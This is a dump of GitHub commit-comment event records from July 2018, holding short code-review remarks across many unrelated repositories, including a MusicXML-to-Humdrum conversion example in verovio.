{"id":"8027345922","type":"CommitCommentEvent","actor":{"login":"trustin"},"repo":{"name":"line/armeria"},"payload":{"comment":{"id":29855762,"position":41,"line":183,"path":"grpc/src/main/java/com/linecorp/armeria/internal/grpc/HttpStreamReader.java","commit_id":"dd026c36e95ef59b6f9dc5f0935fa181928ed628","created_at":"2018-07-27T08:47:28Z","updated_at":"2018-07-27T08:47:28Z","author_association":"MEMBER","body":"Actually, always calling `closeDeframer()` makes `GrpcServiceServerTest. clientSocketClosedBeforeHalfClose*()` fail.\r\n\r\nPreviously, `closeDeframer()` was called only at `onComplete()`, so there was probably a reason you didn't call `closeDeframer()` at `onError()`?"}},"created_at":"2018-07-27T08:47:28Z"}
{"id":"8027348122","type":"CommitCommentEvent","actor":{"login":"anuraaga"},"repo":{"name":"line/armeria"},"payload":{"comment":{"id":29855769,"position":41,"line":183,"path":"grpc/src/main/java/com/linecorp/armeria/internal/grpc/HttpStreamReader.java","commit_id":"dd026c36e95ef59b6f9dc5f0935fa181928ed628","created_at":"2018-07-27T08:47:58Z","updated_at":"2018-07-27T08:47:58Z","author_association":"COLLABORATOR","body":"Ah ok sorry - zoned out"}},"created_at":"2018-07-27T08:47:58Z"}
{"id":"8027361584","type":"CommitCommentEvent","actor":{"login":"mkassner"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29855798,"position":12,"line":null,"path":"pupil_src/shared_modules/gaze_producers.py","commit_id":"7e6d631b65233e6d0bd1558f9c023ed02410f552","created_at":"2018-07-27T08:50:51Z","updated_at":"2018-07-27T08:50:51Z","author_association":"MEMBER","body":"true. I will fix this."}},"created_at":"2018-07-27T08:50:51Z"}
{"id":"8027361803","type":"CommitCommentEvent","actor":{"login":"foxriver76"},"repo":{"name":"foxriver76/ioBroker.denon"},"payload":{"comment":{"id":29855799,"position":23,"line":304,"path":"io-package.json","commit_id":"761a8833cdc9f4b5c4dc469fad3db4b5ebdfca81","created_at":"2018-07-27T08:50:54Z","updated_at":"2018-07-27T08:50:54Z","author_association":"OWNER","body":"![button-dot](https://user-images.githubusercontent.com/25484431/43311488-e44aaf8e-918a-11e8-8f7b-c7aace4fa7fb.png)\r\ndosen't work "}},"created_at":"2018-07-27T08:50:54Z"}
{"id":"8027362582","type":"CommitCommentEvent","actor":{"login":"Fil"},"repo":{"name":"severo/well-formed"},"payload":{"comment":{"id":29855800,"position":null,"line":null,"path":null,"commit_id":"ebfd9906cadc02c152b7c2f0c6e3b54de63dc051","created_at":"2018-07-27T08:51:05Z","updated_at":"2018-07-27T08:51:05Z","author_association":"COLLABORATOR","body":"because it's nicer this way"}},"created_at":"2018-07-27T08:51:05Z"}
{"id":"8027364646","type":"CommitCommentEvent","actor":{"login":"mkassner"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29855803,"position":10,"line":null,"path":"pupil_src/shared_modules/gaze_producers.py","commit_id":"7e6d631b65233e6d0bd1558f9c023ed02410f552","created_at":"2018-07-27T08:51:32Z","updated_at":"2018-07-27T08:51:32Z","author_association":"MEMBER","body":"No, we need to run calibrate because we need to run coorelate_publish either way. otherwise gaze from recording does not get replaced. (And this is the reason I had to make this change.)"}},"created_at":"2018-07-27T08:51:32Z"}
{"id":"8027364744","type":"CommitCommentEvent","actor":{"login":"iMyth"},"repo":{"name":"iMyth/wepy"},"payload":{"comment":{"id":29855804,"position":32,"line":32,"path":"packages/wepy-web/src/components/image.vue","commit_id":"9e32ded6c80fda4ad8fc3898d60a7341cad3da6e","created_at":"2018-07-27T08:51:33Z","updated_at":"2018-07-27T08:51:33Z","author_association":"OWNER","body":"wepy_image_bg class已经有了 background-position: center center;"}},"created_at":"2018-07-27T08:51:33Z"}
{"id":"8027365333","type":"CommitCommentEvent","actor":{"login":"AndKe"},"repo":{"name":"ArduPilot/apm_planner"},"payload":{"comment":{"id":29855805,"position":null,"line":null,"path":null,"commit_id":"736532f14d6dd429f860627783936cceaae971ec","created_at":"2018-07-27T08:51:40Z","updated_at":"2018-07-27T08:51:40Z","author_association":"CONTRIBUTOR","body":"please see https://github.com/ArduPilot/apm_planner/issues/1136"}},"created_at":"2018-07-27T08:51:40Z"}
{"id":"8027367379","type":"CommitCommentEvent","actor":{"login":"mkassner"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29855808,"position":10,"line":null,"path":"pupil_src/shared_modules/gaze_producers.py","commit_id":"7e6d631b65233e6d0bd1558f9c023ed02410f552","created_at":"2018-07-27T08:52:05Z","updated_at":"2018-07-27T08:52:05Z","author_association":"MEMBER","body":"Generally I m in favour of making functions robust rather then check if they can be called before."}},"created_at":"2018-07-27T08:52:05Z"}
{"id":"8027367682","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29855810,"position":null,"line":null,"path":null,"commit_id":"fa0630514df06ec950aace2fccb8457859f02279","created_at":"2018-07-27T08:52:09Z","updated_at":"2018-07-27T08:52:09Z","author_association":"MEMBER","body":"I meant something like\r\n```\r\nif configMount.Source != \"\" && filepath.Clean(configMount.Source) != sys.Source {\r\n    return fmt.Errorf(...)\r\n}\r\n```\r\n\r\nLike, only testing equality when it is configured in the config.json"}},"created_at":"2018-07-27T08:52:09Z"}
{"id":"8027368077","type":"CommitCommentEvent","actor":{"login":"BruceMcl"},"repo":{"name":"efundi/efundi-12-2"},"payload":{"comment":{"id":29855812,"position":null,"line":null,"path":null,"commit_id":"48fb34a11c0333c69332edad06725bca070e89e3","created_at":"2018-07-27T08:52:14Z","updated_at":"2018-07-27T08:52:14Z","author_association":"COLLABORATOR","body":"Not sure what happened here, eclipse committed twice? But with a blank commit here."}},"created_at":"2018-07-27T08:52:14Z"}
{"id":"8027370031","type":"CommitCommentEvent","actor":{"login":"Yukti-03"},"repo":{"name":"udacity/FCND-Motion-Planning"},"payload":{"comment":{"id":29855818,"position":null,"line":null,"path":null,"commit_id":"6b14950b9ddcae940126b1eb87db6d4716e68306","created_at":"2018-07-27T08:52:38Z","updated_at":"2018-07-27T08:52:38Z","author_association":"NONE","body":"How can we can generate this type of csv file from map of a location??\r\n"}},"created_at":"2018-07-27T08:52:38Z"}
{"id":"8027370643","type":"CommitCommentEvent","actor":{"login":"left2right"},"repo":{"name":"ipixiu/codis"},"payload":{"comment":{"id":29855822,"position":11,"line":211,"path":"pkg/utils/redis/client.go","commit_id":"74643acbcaff3b2ae4c516839688fcfc743abb33","created_at":"2018-07-27T08:52:47Z","updated_at":"2018-07-27T08:52:47Z","author_association":"NONE","body":"\"CONFIG SET masterauth\" should be reserved"}},"created_at":"2018-07-27T08:52:47Z"}
{"id":"8027376357","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29855837,"position":11,"line":11,"path":"validation/util/linux_mount.go","commit_id":"15bb818bbc95bbad5033aa0fa31d7e7f7af3de84","created_at":"2018-07-27T08:54:01Z","updated_at":"2018-07-27T08:54:01Z","author_association":"MEMBER","body":"\"or\"?\r\n\r\ndo you mean of the parent of the given mount point?"}},"created_at":"2018-07-27T08:54:01Z"}
{"id":"8027378269","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29855841,"position":15,"line":25,"path":"assembl/alembic/versions/8d37745a8e69_add_tables_and_columns_for_cookie_.py","commit_id":"60bb78e195a58b55ddcdcf8674d91fe680869e68","created_at":"2018-07-27T08:54:26Z","updated_at":"2018-07-27T08:54:26Z","author_association":"CONTRIBUTOR","body":"There is something weird with the indentation here. Are you sure it's 4 spaces?"}},"created_at":"2018-07-27T08:54:26Z"}
{"id":"8027378387","type":"CommitCommentEvent","actor":{"login":"hclivess"},"repo":{"name":"maccaspacca/BismuthToolsWeb"},"payload":{"comment":{"id":29855842,"position":null,"line":null,"path":null,"commit_id":"04519972d03b2883ebb5c01f27172901f85cf27a","created_at":"2018-07-27T08:54:27Z","updated_at":"2018-07-27T08:54:27Z","author_association":"COLLABORATOR","body":"Thank you, nice introduction to BeautifulSoup for me"}},"created_at":"2018-07-27T08:54:27Z"}
{"id":"8027382292","type":"CommitCommentEvent","actor":{"login":"arodrigues2014"},"repo":{"name":"arodrigues2014/prueba"},"payload":{"comment":{"id":29855855,"position":null,"line":null,"path":null,"commit_id":"b6777b87df5bb29f0e9667549e66dd19d3a599e7","created_at":"2018-07-27T08:55:18Z","updated_at":"2018-07-27T08:55:18Z","author_association":"OWNER","body":"Proyecto Angular (Front Enda)"}},"created_at":"2018-07-27T08:55:18Z"}
{"id":"8027383195","type":"CommitCommentEvent","actor":{"login":"chenwei-tw"},"repo":{"name":"DLTcollab/dcurl"},"payload":{"comment":{"id":29855860,"position":null,"line":null,"path":null,"commit_id":"884300820147c3b4a747fb90c552ca1d3c61ca5b","created_at":"2018-07-27T08:55:29Z","updated_at":"2018-07-27T08:55:29Z","author_association":"COLLABORATOR","body":"What you means is to compare the performance between non-unrolling c impl. and unrolling c impl. on ARM machine?"}},"created_at":"2018-07-27T08:55:29Z"}
{"id":"8027386721","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29855868,"position":21,"line":17,"path":"lib/iterators/map.ts","commit_id":"44ea339745311a29b3c0433f57ec28268bbf4b78","created_at":"2018-07-27T08:56:12Z","updated_at":"2018-07-27T08:56:12Z","author_association":"CONTRIBUTOR","body":"Maybe `yield transform(element, index++);` ?"}},"created_at":"2018-07-27T08:56:12Z"}
{"id":"8027389767","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29855872,"position":null,"line":null,"path":null,"commit_id":"9700a2675a0903df495fc83aadad8341462e19b4","created_at":"2018-07-27T08:56:49Z","updated_at":"2018-07-27T08:56:49Z","author_association":"NONE","body":"Speculatively testing a simplification with [-3..1] bounds against another simplification in a pull request that has not yet been approved is a waste of ressources.\r\n\r\nPlease always test against the latest master (even if that means waiting 24 hours before a decision has been made) :-)\r\n\r\nThanks :-)"}},"created_at":"2018-07-27T08:56:49Z"}
{"id":"8027394038","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29855877,"position":14,"line":8,"path":"lib/reducers/indexOf.ts","commit_id":"44ea339745311a29b3c0433f57ec28268bbf4b78","created_at":"2018-07-27T08:57:43Z","updated_at":"2018-07-27T08:57:43Z","author_association":"CONTRIBUTOR","body":"Same as in map, maybe use `index++`"}},"created_at":"2018-07-27T08:57:43Z"}
{"id":"8027399288","type":"CommitCommentEvent","actor":{"login":"Florenza"},"repo":{"name":"Florenza/angular-bootstrap-datepicker"},"payload":{"comment":{"id":29855884,"position":null,"line":null,"path":null,"commit_id":"3d1505a1bbc8f25f9b26e1de63edbc831529f1d2","created_at":"2018-07-27T08:58:51Z","updated_at":"2018-07-27T08:58:51Z","author_association":"OWNER","body":"优化原有的中国点击时间错位，添加多选功能，暂不支持（分隔符号切换），语言包只有中国（包括台湾省）；\r\nOptimize the original Chinese click time mismatch, add multi selection function, temporarily support (separation symbol switching), language package is only China (including Taiwan province);"}},"created_at":"2018-07-27T08:58:51Z"}
{"id":"8027400107","type":"CommitCommentEvent","actor":{"login":"dimadeveatii"},"repo":{"name":"labs42io/array-query"},"payload":{"comment":{"id":29855885,"position":14,"line":8,"path":"lib/reducers/indexOf.ts","commit_id":"44ea339745311a29b3c0433f57ec28268bbf4b78","created_at":"2018-07-27T08:59:01Z","updated_at":"2018-07-27T08:59:01Z","author_association":"CONTRIBUTOR","body":"I think we can init index to -1, and then:\r\n`if (predicate(element, ++index))`"}},"created_at":"2018-07-27T08:59:01Z"}
{"id":"8027400117","type":"CommitCommentEvent","actor":{"login":"jack-h"},"repo":{"name":"casper-astro/mlib_devel"},"payload":{"comment":{"id":29855886,"position":null,"line":null,"path":null,"commit_id":"85b5d6d5d25fbb4a1904ae9f065503777eec23fc","created_at":"2018-07-27T08:59:01Z","updated_at":"2018-07-27T08:59:01Z","author_association":"CONTRIBUTOR","body":"This is being moved to the \"setting up the toolflow\" docs"}},"created_at":"2018-07-27T08:59:01Z"}
{"id":"8027401590","type":"CommitCommentEvent","actor":{"login":"awjh-ibm"},"repo":{"name":"BitBondtmUK/vehicle-lifecycle-iot-extension"},"payload":{"comment":{"id":29855888,"position":null,"line":null,"path":null,"commit_id":"689b6eb4eda649ed4fcc30b50cc90cd8be286bc3","created_at":"2018-07-27T08:59:18Z","updated_at":"2018-07-27T08:59:18Z","author_association":"NONE","body":"Hi, I have been able to run the demo locally on my machine using the latest code in the main repo. Is your fork up to date?"}},"created_at":"2018-07-27T08:59:18Z"}
{"id":"8027402144","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29855889,"position":51,"line":1026,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T08:59:25Z","updated_at":"2018-07-27T08:59:25Z","author_association":"NONE","body":"Remove auto, change `ImVec4 &` to `ImVec4& `."}},"created_at":"2018-07-27T08:59:25Z"}
{"id":"8027402987","type":"CommitCommentEvent","actor":{"login":"sergeyschegolev"},"repo":{"name":"skyRoma/ReactGeneral"},"payload":{"comment":{"id":29855892,"position":21,"line":47,"path":"client/src/components/Main/Main.jsx","commit_id":"3c3723bde4f97967b8a3756eac209fb4e51bca08","created_at":"2018-07-27T08:59:35Z","updated_at":"2018-07-27T08:59:35Z","author_association":"COLLABORATOR","body":"Could you please try the following:\r\nthis.dragHandler(event.target, true)\r\ndragHandler = ({classList}, value)"}},"created_at":"2018-07-27T08:59:35Z"}
{"id":"8027403138","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29855893,"position":67,"line":1042,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T08:59:37Z","updated_at":"2018-07-27T08:59:37Z","author_association":"NONE","body":"Single line."}},"created_at":"2018-07-27T08:59:37Z"}
{"id":"8027407867","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29855910,"position":52,"line":39,"path":"validation/mounts/mounts.go","commit_id":"15bb818bbc95bbad5033aa0fa31d7e7f7af3de84","created_at":"2018-07-27T09:00:30Z","updated_at":"2018-07-27T09:00:30Z","author_association":"MEMBER","body":"It seems weird to contrive the `rspec.Mount` to match the filesystem type to fit the test code in `runtimetest`.\r\n\r\nI think the code `if configMount.Type != sys.Type {` in `runtimetest` must be changed instead. `rspec.Mount.Type` can be empty or just \"bind\" for bind mounts. \r\n\r\nI have a WIP branch about clarifying the spec about that:\r\nhttps://github.com/kinvolk/runtime-spec/tree/alban/source-mount"}},"created_at":"2018-07-27T09:00:30Z"}
{"id":"8027413880","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29855917,"position":60,"line":1035,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T09:01:38Z","updated_at":"2018-07-27T09:01:38Z","author_association":"NONE","body":"I don't have solid proof but I suspect that using 3/4 locals instead of 3/4 sized-array may facilitate the compilers life here. I think we can test this theory once we have a stress test to measure performance (as discussed earlier in the thread: try rendering 10k/100k shapes and measure). Maybe keep note of it in the meanwhile."}},"created_at":"2018-07-27T09:01:38Z"}
{"id":"8027414222","type":"CommitCommentEvent","actor":{"login":"papr"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29855918,"position":10,"line":null,"path":"pupil_src/shared_modules/gaze_producers.py","commit_id":"7e6d631b65233e6d0bd1558f9c023ed02410f552","created_at":"2018-07-27T09:01:42Z","updated_at":"2018-07-27T09:01:42Z","author_association":"MEMBER","body":"I agree, that we need to call `correlate_and_publish()` here, independently of the available reference data in order to replace `Gaze From Recording` data.\r\n\r\nBut calling `calibrate()` will show an error to the user. That is ok, because usually, the user has to initiate the calibration and gets immediate feedback. But in this case, the user will get an error message when they open the plugin for the first time since there is neither natural features nore circle marker positions.\r\n\r\nThe function is robust to call. The only question is if you want that error message on load."}},"created_at":"2018-07-27T09:01:42Z"}
{"id":"8027415878","type":"CommitCommentEvent","actor":{"login":"niiiro"},"repo":{"name":"bakechain/bakechain"},"payload":{"comment":{"id":29855920,"position":null,"line":null,"path":null,"commit_id":"6eeed3091b3927b6148f10ecc858f0604a131851","created_at":"2018-07-27T09:02:03Z","updated_at":"2018-07-27T09:02:03Z","author_association":"NONE","body":"Hey Stephen,\r\n\r\nI use v3.0 and issue still occurs here -It stops randomly.\r\n\r\nThank you for your work."}},"created_at":"2018-07-27T09:02:03Z"}
{"id":"8027418238","type":"CommitCommentEvent","actor":{"login":"ocornut"},"repo":{"name":"franciscod/imgui"},"payload":{"comment":{"id":29855922,"position":95,"line":1070,"path":"imgui_draw.cpp","commit_id":"6c682353e17cc1ffa998d6e817582fbb9fb652dc","created_at":"2018-07-27T09:02:30Z","updated_at":"2018-07-27T09:02:30Z","author_association":"NONE","body":"Not necessary to undo the PrimReserve, it's ok to assert and lead to a crash, we don't attempt to pretend to be failsafe with incorrect uses."}},"created_at":"2018-07-27T09:02:30Z"}
{"id":"8027421915","type":"CommitCommentEvent","actor":{"login":"Nibsy"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29855929,"position":null,"line":null,"path":null,"commit_id":"d3bdedad037592aae3646f0f432c33e116dbdacb","created_at":"2018-07-27T09:03:10Z","updated_at":"2018-07-27T09:03:10Z","author_association":"CONTRIBUTOR","body":"@b606 j'avais changé \"une multitude\" pour \"un large groupe\" pour éviter le \"ils\", au cas où ce serait par exemple des gazelles. A toi de voir :) (d'ailleurs, le verbe s'accorde pour moi à \"une multitude\", donc \"est\")"}},"created_at":"2018-07-27T09:03:10Z"}
{"id":"8027429589","type":"CommitCommentEvent","actor":{"login":"Yasir-siddiqui"},"repo":{"name":"lzzy12/tgbot"},"payload":{"comment":{"id":29855945,"position":null,"line":null,"path":null,"commit_id":"61b526548080b03fe2ce5ed76912394411149470","created_at":"2018-07-27T09:04:34Z","updated_at":"2018-07-27T09:04:34Z","author_association":"NONE","body":"BC Zinda hai?\r\nTg kyu leave kardiya\r\n"}},"created_at":"2018-07-27T09:04:34Z"}
{"id":"8027429793","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29855946,"position":null,"line":null,"path":null,"commit_id":"0e2038db4d10baf0318ca31d77d6a29b34ce8f8f","created_at":"2018-07-27T09:04:36Z","updated_at":"2018-07-27T09:04:36Z","author_association":"COLLABORATOR","body":"Und der Rest vermutlich auch, ok."}},"created_at":"2018-07-27T09:04:36Z"}
{"id":"8027430749","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29855950,"position":null,"line":null,"path":null,"commit_id":"6cdb4a3dabcb3d433cb092a69773344c06108e51","created_at":"2018-07-27T09:04:47Z","updated_at":"2018-07-27T09:04:47Z","author_association":"CONTRIBUTOR","body":"Example:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE score-partwise PUBLIC \"-//Recordare//DTD MusicXML 3.1 Partwise//EN\" \"http://www.musicxml.org/dtds/partwise.dtd\">\r\n<score-partwise version=\"3.1\">\r\n  <work>\r\n    <work-title>Title</work-title>\r\n    </work>\r\n  <identification>\r\n    <creator type=\"composer\">Composer</creator>\r\n    <encoding>\r\n      <software>MuseScore 2.2.1</software>\r\n      <encoding-date>2018-07-27</encoding-date>\r\n      <supports element=\"accidental\" type=\"yes\"/>\r\n      <supports element=\"beam\" type=\"yes\"/>\r\n      <supports element=\"print\" attribute=\"new-page\" type=\"yes\" value=\"yes\"/>\r\n      <supports element=\"print\" attribute=\"new-system\" type=\"yes\" value=\"yes\"/>\r\n      <supports element=\"stem\" type=\"yes\"/>\r\n      </encoding>\r\n    </identification>\r\n  <defaults>\r\n    <scaling>\r\n      <millimeters>7.05556</millimeters>\r\n      <tenths>40</tenths>\r\n      </scaling>\r\n    <page-layout>\r\n      <page-height>1683.36</page-height>\r\n      <page-width>1190.88</page-width>\r\n      <page-margins type=\"even\">\r\n        <left-margin>56.6929</left-margin>\r\n        <right-margin>56.6929</right-margin>\r\n        <top-margin>56.6929</top-margin>\r\n        <bottom-margin>113.386</bottom-margin>\r\n        </page-margins>\r\n      <page-margins type=\"odd\">\r\n        <left-margin>56.6929</left-margin>\r\n        <right-margin>56.6929</right-margin>\r\n        <top-margin>56.6929</top-margin>\r\n        <bottom-margin>113.386</bottom-margin>\r\n        </page-margins>\r\n      </page-layout>\r\n    <word-font font-family=\"FreeSerif\" font-size=\"10\"/>\r\n    <lyric-font font-family=\"FreeSerif\" font-size=\"11\"/>\r\n    </defaults>\r\n  <credit page=\"1\">\r\n    <credit-words default-x=\"595.44\" default-y=\"1626.67\" justify=\"center\" valign=\"top\" font-size=\"24\">Title</credit-words>\r\n    </credit>\r\n  <credit page=\"1\">\r\n    <credit-words default-x=\"1134.19\" default-y=\"1526.67\" justify=\"right\" valign=\"bottom\" font-size=\"12\">Composer</credit-words>\r\n    </credit>\r\n  <part-list>\r\n    <score-part id=\"P1\">\r\n      <part-name>Piano</part-name>\r\n      <part-abbreviation>Pno.</part-abbreviation>\r\n      <score-instrument id=\"P1-I1\">\r\n        <instrument-name>Piano</instrument-name>\r\n        </score-instrument>\r\n      <midi-device id=\"P1-I1\" port=\"1\"></midi-device>\r\n      <midi-instrument id=\"P1-I1\">\r\n        <midi-channel>1</midi-channel>\r\n        <midi-program>1</midi-program>\r\n        <volume>78.7402</volume>\r\n        <pan>0</pan>\r\n        </midi-instrument>\r\n      </score-part>\r\n    </part-list>\r\n  <part id=\"P1\">\r\n    <measure number=\"1\" width=\"1077.49\">\r\n      <print>\r\n        <system-layout>\r\n          <system-margins>\r\n            <left-margin>0.00</left-margin>\r\n            <right-margin>-0.00</right-margin>\r\n            </system-margins>\r\n          <top-system-distance>170.00</top-system-distance>\r\n          </system-layout>\r\n        </print>\r\n      <attributes>\r\n        <divisions>1</divisions>\r\n        <key>\r\n          <fifths>0</fifths>\r\n          </key>\r\n        <time>\r\n          <beats>4</beats>\r\n          <beat-type>4</beat-type>\r\n          </time>\r\n        <clef>\r\n          <sign>G</sign>\r\n          <line>2</line>\r\n          </clef>\r\n        </attributes>\r\n      <note default-x=\"71.29\" default-y=\"-30.00\">\r\n        <grace slash=\"yes\"/>\r\n        <pitch>\r\n          <step>G</step>\r\n          <octave>4</octave>\r\n          </pitch>\r\n        <voice>1</voice>\r\n        <type>eighth</type>\r\n        <stem>up</stem>\r\n        </note>\r\n      <note default-x=\"89.73\" default-y=\"-35.00\">\r\n        <pitch>\r\n          <step>F</step>\r\n          <octave>4</octave>\r\n          </pitch>\r\n        <duration>2</duration>\r\n        <voice>1</voice>\r\n        <type>half</type>\r\n        <stem>up</stem>\r\n        </note>\r\n      <note default-x=\"559.69\" default-y=\"-30.00\">\r\n        <grace/>\r\n        <pitch>\r\n          <step>G</step>\r\n          <octave>4</octave>\r\n          </pitch>\r\n        <voice>1</voice>\r\n        <type>eighth</type>\r\n        <stem>up</stem>\r\n        </note>\r\n      <note default-x=\"578.13\" default-y=\"-25.00\">\r\n        <pitch>\r\n          <step>A</step>\r\n          <octave>4</octave>\r\n          </pitch>\r\n        <duration>2</duration>\r\n        <voice>1</voice>\r\n        <type>half</type>\r\n        <stem>up</stem>\r\n        </note>\r\n      <barline location=\"right\">\r\n        <bar-style>light-heavy</bar-style>\r\n        </barline>\r\n      </measure>\r\n    </part>\r\n  </score-partwise>\r\n```\r\n\r\nnow converts to humdrum as:\r\n\r\n```\r\n**kern\r\n*clefG2\r\n*k[]\r\n*M4/4\r\n=1\r\n8qg/\r\n2f\r\n8qqg/\r\n2a\r\n==\r\n*-\r\n```\r\n\r\n`q` means an unaccented grace note (coming before the beat), and `qq` means accented grace notes (coming on the beat).  The default modern convention is that a slash means `q` and without a slash means `qq`.\r\n\r\nMEI conversion of the humdrum:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-27T11:04:56\" version=\"2.0.0-dev-3c8c818\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000001837165201\">\r\n                <score xml:id=\"score-0000000247073038\">\r\n                    <scoreDef xml:id=\"scoredef-0000000636261735\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000002133882092\">\r\n                            <staffDef xml:id=\"staffdef-0000001183696061\" clef.shape=\"G\" clef.line=\"2\" key.sig=\"0\" meter.count=\"4\" meter.unit=\"4\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000000393532765\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L5\" right=\"end\" n=\"1\">\r\n                            <staff xml:id=\"staff-L5F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L5F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L6F1\" dur=\"8\" oct=\"4\" pname=\"g\" grace=\"unacc\" stem.dir=\"up\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L7F1\" dur=\"2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L8F1\" dur=\"8\" oct=\"4\" pname=\"g\" grace=\"acc\" stem.dir=\"up\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L9F1\" dur=\"2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n\r\nRendering in verovio:\r\n\r\n<img width=\"485\" alt=\"screen shot 2018-07-27 at 11 05 20 am\" src=\"https://user-images.githubusercontent.com/3487289/43312175-caf6f93c-918c-11e8-8d33-924f93e68c41.png\">\r\n"}},"created_at":"2018-07-27T09:04:47Z"}
{"id":"8027433369","type":"CommitCommentEvent","actor":{"login":"bealex"},"repo":{"name":"SvetlanaTs/how-much"},"payload":{"comment":{"id":29855953,"position":18,"line":48,"path":"HowMuch/Code/Presentation/Groups/ViewControllers/GroupListViewController.swift","commit_id":"7dc58bac782e59fc25ab983599ae515e132a13a4","created_at":"2018-07-27T09:05:21Z","updated_at":"2018-07-27T09:05:21Z","author_association":"COLLABORATOR","body":"Апкод сильно лучше настраивается, но тоже не идеально."}},"created_at":"2018-07-27T09:05:21Z"}
{"id":"8027434702","type":"CommitCommentEvent","actor":{"login":"foxriver76"},"repo":{"name":"foxriver76/ioBroker.denon"},"payload":{"comment":{"id":29855964,"position":23,"line":304,"path":"io-package.json","commit_id":"761a8833cdc9f4b5c4dc469fad3db4b5ebdfca81","created_at":"2018-07-27T09:05:36Z","updated_at":"2018-07-27T09:05:36Z","author_association":"OWNER","body":"at least not with admin on stable"}},"created_at":"2018-07-27T09:05:36Z"}
{"id":"8027439246","type":"CommitCommentEvent","actor":{"login":"suhas4090"},"repo":{"name":"chimple/tahiti"},"payload":{"comment":{"id":29855969,"position":null,"line":null,"path":null,"commit_id":"ba1fdbe090892036b15a93a2c9a7a14129f82657","created_at":"2018-07-27T09:06:29Z","updated_at":"2018-07-27T09:06:29Z","author_association":"NONE","body":"#11 done"}},"created_at":"2018-07-27T09:06:29Z"}
{"id":"8027441272","type":"CommitCommentEvent","actor":{"login":"dagewa"},"repo":{"name":"dials/dials"},"payload":{"comment":{"id":29855971,"position":175,"line":205,"path":"util/export_mtz.py","commit_id":"33f6775cc3621ba066119c2e474c19fc4b93c01b","created_at":"2018-07-27T09:06:55Z","updated_at":"2018-07-27T09:06:55Z","author_association":"MEMBER","body":"I see that `dials.symmetry` imports this function, so it is currently broken on this branch. A comment suggests this function should be moved elsewhere: https://github.com/dials/dials/blob/refactor-export-mtz/command_line/symmetry.py#L134"}},"created_at":"2018-07-27T09:06:55Z"}
{"id":"8027444705","type":"CommitCommentEvent","actor":{"login":"Mirojane"},"repo":{"name":"Mirojane/Juan_Singtel"},"payload":{"comment":{"id":29855979,"position":null,"line":null,"path":null,"commit_id":"17f37c1b630234d1807b880ea97b50dc12e37a71","created_at":"2018-07-27T09:07:38Z","updated_at":"2018-07-27T09:07:38Z","author_association":"OWNER","body":" ff"}},"created_at":"2018-07-27T09:07:38Z"}
